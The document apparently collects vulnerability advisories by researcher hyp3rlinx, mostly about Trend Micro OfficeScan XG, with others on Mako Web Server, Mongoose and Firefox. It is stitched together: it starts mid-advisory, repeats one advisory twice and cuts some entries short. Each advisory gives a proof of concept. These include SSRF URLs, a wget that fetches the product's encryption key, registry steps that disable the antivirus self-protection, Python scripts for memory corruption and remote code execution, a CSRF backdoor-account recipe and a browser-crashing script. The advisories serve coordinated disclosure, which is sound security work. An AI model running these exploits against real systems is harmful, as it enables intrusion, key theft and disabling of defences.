iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, soap, com_dotnet [INFO] WGF version : 3.8 [INFO] WGF current wp in /path/to/widgetPool/config.php : wp2 [INFO] WGF is /path/to/widgets_new exists : true [ERROR] C:\Windows\TEMP check read/write permissions : failed To solved this problem please reference document here. etc... Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: June 2, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information con
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Server Side Request Forgery (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: === OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Unautherized Server Side Request Forgery CVE Reference: == N/A Security Issue: Unauthorized LAN attackers that can reach the OfficeScan XG application can make arbitrary HTTP requests to external and internal servers. Abusing a Server Side Request Forgery flaw in the "help_Proxy.php" functionality. Exploit/POC: = https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://:8080 python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... - - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 - help_proxy.php HTTP response: {"request_url":"http:\/\/:8080","http_code":200,"flag":1} Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: May 31, 2017 Vendor reply: "We confirmed that this is a valid vulnerability. We are now working on a hotfix to remediate the issue." : June 30, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution CVE-2017-14084 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Man-in-the-Middle (MITM) Remote Code Execution CVE Reference: == CVE-2017-14084 Security Issue: === MITM vector exists as the CURL request used by Send() function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set to false. CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine. CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want to talk to... References: === https://success.trendmicro.com/solution/1118372 Vulnerable code snippet... curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false); curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true); curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true); curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0); <=== HERE curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0); < THERE Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: May 31, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Start Remote Process Code Execution / DOS - INI Corruption CVE-2017-14086 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: OfficeScan XG v11.0 and (12.0)* Vulnerability Type: === Unauthorized Start Remote Process Code Execution Unauthorized Denial Of Service - INI Corruption OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. CVE Reference: == CVE-2017-14086 Security Issue: Remote unauthenticated attackers who connect to the OfficeScan XG application can temporarily start the "fcgiOfcDDA.exe" executable this process will run for short time before dies, server disk space may also be consumed with dump files by making continous HTTP requests. References: === https://success.trendmicro.com/solution/1118372 Exploit/POC Start Remote Process Code Execution: c:\> curl -k https://VICTIM-IP:4343/officescan/console/CGI/ HTTP response: 403 - Forbidden: Access is denied. You do not have permission to view this directory or page using the credentials that you supplied But, we can access it directly :) c:\> curl -v -k https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe HTTP Response: 500 - Internal server error. There is a problem with the resource you are looking for, and it cannot be displayed. The EXE is called then runs for short time before .DMP is generated. fcgiOfcDDA.exe.6808.dmp The stored exception information can be accessed via .ecxr. (568.112c): Unknown exception - code c00d (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - eax= ebx=0014f780 ecx= edx= esi=0002 edi= eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!NtWaitForMultipleObjects+0x15: Exploit/POC (Denial Of Service / INI Corruption): == [root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe * About to connect() to VICTIM-IP port 4343 * Trying VICTIM-IP.. connected
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Encryption Key Disclosure CVE-2017-14083 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Unauthorized Encryption Key Disclosure CVE Reference: == CVE-2017-14083 Security Issue: Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application which usually runs on port 4343 can download the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the OfficeScan XG encryption process. References: === https://success.trendmicro.com/solution/1118372 e.g. In "config.php" /* * * Encryption module configurations */ $wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key";<= HERE $wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ... /* * * Framework configurations */ Exploit/POC: = [root@localhost /]# wget --no-check-certificate https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key --14:59:52-- https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key Connecting to VICTIM-IP:4343... connected. WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP': Self-signed certificate encountered. HTTP request sent, awaiting response... 200 OK Length: 32 [application/octet-stream] Saving to: `crypt.key' 100%[==>] 32 --.-K/s in 0s 14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32] Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: May 31, 2017 Vendor: "hotfix in progress". June 23, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Change Prevention Image File Execution Bypass (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Image File Execution Bypass CVE Reference: == N/A Security Issue: OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM service that is supposed to protect OfficeScan processes like "PccNTMon.exe" from being terminated, and also prevents unauthorized arbitrary registry settings being made to the protected machine even by an Administrator. However, we can easily bypass by exploiting Windows Image File Execution Options (IFEO) to hijack the service process. IFEO has been used by malwares for some time to prevent process from running or execute a process of an attackers choosing in place of the process the user expects. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options All an attacker needs to do is create a registry key in IFEO with the same name as "TMBMSRV.exe" which is used by the "Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After creating this registry key we create a "string value" named debugger pointing to say "calc.exe", we wait and once system reboots BOOM! References: === https://success.trendmicro.com/solution/1118372 Exploit/POC: = Reproduction: 1) Open registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 2) Create a new Key with no name 3) Create a new string value under the new key named "debugger" with value of c:\Windows\system32\calc.exe 4) Rename the created key to TMBMSRV.exe 5) Reboot system Done! We can then not only Kill TM but write to TrendMicro whitelist key in the registry for our evil binary to be left alone in peace. Network Access: === Local Severity: = High Disclosure Timeline: = Vendor Notification: June 28, 2017 Vendor Reply: "Officescan Build 1222 which is affected by this bug was already pulled and is no longer available for public download" Vendor Reply: "created hotfixes for product improvement." September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Memory Corruption CVE-2017-14089 (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Unauthorized Remote Memory Corruption CVE Reference: == CVE-2017-14089 Security Issue: Remote unauthenticated attackers that can make connection the TrendMicro OfficeScan XG application targeting the "cgiShowClientAdm.exe" process can cause memory corruption issues. References: === https://success.trendmicro.com/solution/1118372 Exploit/POC: = import urllib,urllib2 from urllib2 import Request print 'TrendMicro OfficeScan XG' print 'Stack Memory Corruption POC' print 'by hyp3rlinx\n' IP="VICTIM-IP:4343" PAYLOAD="A"*256 url = urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe') cookie="Cookie: serror=0; session_expired=no; FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|; stamp=2231521137; timestamp=1497360567; DisabledIds=.; LogonUser=A; ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; theme=default; wf_CSRF_token=; serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; LANG=en_US; theme=default; lastID=33; lastTab=-1" print '\nsending packetz... \n'+ cookie ##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411") #<== X-CSRFToken IS NOT EVEN NEEDED! url.add_header("Content-Type", "application/x-www-form-urlencoded; charset=utf-8") url.add_header("Content-Length", "54") url.add_header("Cookie ",cookie) req=urllib2.urlopen(url) res = urllib2.urlopen(req) print res Network Access: === Remote Severity: = High Disclosure Timeline: Vendor Notification: June 5, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-14087 Trend Micro OfficeScan v11.0 and XG (12.0)* Host Header Injection (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Host Header Injection CVE Reference: == CVE-2017-14087 Security Issue: Host header injection issue as "db_controller.php" relies on $_SERVER['HTTP_HOST'] which can be spoofed by client, instead of $_SERVER['SERVER_NAME']. In environments where caching is in place by making HTTP GET request with a poisoned HOST header webpages can potentially render arbitrary links that point to a malicious website. Exploit/POC: = c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP" Network Access: === Remote Severity: = Medium Disclosure Timeline: == Vendor Notification: June 2, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-14084 Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution (apparitionsec / hyp3rlinx)
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt [+] ISR: ApparitionSec Vendor: == www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Man-in-the-Middle (MITM) Remote Code Execution CVE Reference: == CVE-2017-14084 Security Issue: === MITM vector exists as the CURL request used by Send() function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set to false. CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine. CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want to talk to... References: === https://success.trendmicro.com/solution/1118372 Vulnerable code snippet... curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false); curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true); curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true); curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0); <=== HERE curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0); < THERE Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: May 31, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Mako Web Server v2.5 Multiple Unauthenticated Vulnerabilities (apparitionsec / hyp3rlinx)
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391 [+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt [+] ISR: ApparitionSec Vulnerabilities Summary The following advisory describe three (3) vulnerabilities found in Mako Servers tutorial page. The vulnerabilities found are: Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution Unauthenticated File Disclosure Unauthenticated Server Side Request Forgery As these tutorial may be used as the basis for production code, it is important for users to be aware of these issues. As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides an application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems. Credit An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program Vendor response RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory, saying: I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place. Internally I need to set-up a cost allocation account for billing against these support inquiries. At this time its unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed. Vulnerabilities details Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution: Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to save.lsp web page, the input passed to a function responsible for accessing the filesystem. The attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to manage.lsp HTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1' HTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true=2.1=lua' Proof of Concept import urllib2,time #MakoServer v2.5 Remote Command Execution 0day #Credits: John Page AKA hyp3rlinx #= print 'MakoServer v2.5 Remote Command Execution' CMD="os.execute('c:/Windows/system32/calc.exe')" opener = urllib2.build_opener(urllib2.HTTPHandler) request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD) request.add_header('Content-Type', 'text/plain;charset=UTF-8') request.add_header('X-Requested-With', 'XMLHttpRequest') request.add_header('Referer', 'http://localhost/Lua-Types.lsp') request.get_method = lambda: 'PUT' opener.open(request) time.sleep(1) urllib2.urlopen('http://IP/examples/manage.lsp?execute=true=2.1=lua') Unauthenticated File Disclosure Mako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI IP/fs/../.., the input passed without modification and the response with the file content is returned. Proof of Concept The following GET request will response with the C/Windows/system.ini content: curl -v http://VICTIM-IP/fs/C/Windows/system.ini * About to connect() to VICTIM-IP port 80 * Trying VICTIM-IP... connected * Connected to VICTIM-IP (VICTIM-IP) port 80 > GET /fs/C/Windows/system.ini HTTP/1.1 > User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 > OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5 > Host: VICTIM-IP > Accept: */* > < HTTP/1.1 200 OK < Date: Mon, 07 Aug 2017 22:21:27 GMT < Server: MakoServer.net < Content-Type: application/octet-stream < Accept-Ranges: bytes < Etag: 58b4be20 < Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT < Content-Length: 219 < Keep-Alive: Keep-Alive ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] Server Side Request Forgery Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the rtl/appmgr/new-application.lsp URI, the input will be executed and the server will connect to the attackers machine. Proof of Concept Start Wireshark to see successful connections made from Mako Web Server victim machine. Initiate requests from another machine using CURL: curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP Network Access: === Re
CVE-2017-11567 Mongoose Web Server v6.5 CSRF Command Execution ( apparitionsec @ gmail / hyp3rlinx )
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt [+] ISR: apparitionSec Vendor: === www.cesanta.com Product: == Mongoose Web Server (Free Edition) Mongoose-free-6.5.exe Download: https://cesanta.com/binary.html Mongoose - GitHub's most popular embedded web server and multi-protocol networking library Mongoose Embedded Web Server Library - Mongoose is more than an embedded webserver. It is a multi-protocol embedded networking library with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more. Vulnerability Type: === CSRF - Command Execution CVE Reference: == CVE-2017-11567 Security Issue: Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visit attacker controlled web page can execute system commands on the system hosting Mongoose server. However, IF Mongoose web server is installed as service then executing programs e.g. "calc.exe" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests commands may become unstable when Mongoose is run as a service. When Mongoose is run standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on server like .PHP etc. to point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker generated file, after injecting commands into Mongoose web servers log file that will get excuted when log file is later requested. This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language "pl,php,cgi" used, so when we can set to use correct programming language when file is created during initial CRSF attack. Note: If running commands with arguments, we have to use "\t" tab chars as using space will break our TELNET based code injection to the server log. e.g. GET HTTP/1.1 OR just TELNET to Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET. After Command Injection "Mongoose.conf" will be: # Mongoose web server configuration file. # For detailed description of every option, visit # https://github.com/cesanta/Mongoose # Lines starting with '#' and empty lines are ignored. # To make a change, remove leading '#', modify option's value, # save this file and then restart Mongoose. # access_control_list access_log_file C:\Mongoose.access.php <=== BOOM # auth_domain mydomain.com cgi_interpreter c:\xampp\php\php.exe <== MUST BE SET # cgi_pattern **.cgi$|**.pl$|**.php$ # dav_auth_file # dav_root # debug 0 document_root C:\ # enable_directory_listing yes # error_log_file # extra_headers # extra_mime_types # global_auth_file # hide_files_patterns # hexdump_file index_files Mongoose.access.php < BOOM # listening_port 8080 # run_as_user # ssi_pattern **.shtml$|**.shtm$ # ssl_certificate # ssl_ca_certificate # start_browser yes # url_rewrites Mongoose log file Command Inject to create backdoor. --- 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:30 - 127.0.0.1 - GET 400 0 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 - Tested Windows 7. Exploit/POC: = 1) add backdoor account POC. http://127.0.0.1:8080/__mg_admin?save; method="post"> document.forms[0].submit() 2) TELNET x.x.x.x 8080 GET HTTP/1.1 Enter Enter TELNET x.x.x.x 8080 GET / HTTP/1.1 Enter Enter Done, backdoor added! 1) run calc.exe POC. http://127.0.0.1:8080/__mg_admin?save; method="post"> document.forms[0].submit() 2) TELNET x.x.x.x 8080 GET / HTTP/1.1 Enter Enter Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: July 23, 2017 Vendor Notification: July 28, 2017 Vendor Acknowledgement: July 31, 2017 Vendor Fixed released version 6.9 : September 4, 2017 September 4, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" wi
Firefox v54.0.1 Denial Of Service
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/FIREFOX-v54.0.1-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: === www.mozilla.org Product: === Firefox v54.0.1 Vulnerability Type: === Denial Of Service Security Issue: Dynamically creating HTML elements IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA and assigning very long string of junk chars to the "style.color" property results in Firefox Browser out of memory crash (not tab crash). Tested on Windows 7 References: https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288 Exploit/POC: = var p1 = "\x41"; for (var c=0;c<0xC350;c++){ p1+="\x41"; } var p2="\x41"; for (c=0;c<0x1388;c++){ p2 += p1; } var el = document.createElement('img') //FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA //<=== OR any of these elements. el.style.color=p2 document.body.appendChild(el) Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: June 27, 2017 July 7, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Symantec VIP Access Desktop Arbitrary DLL Execution
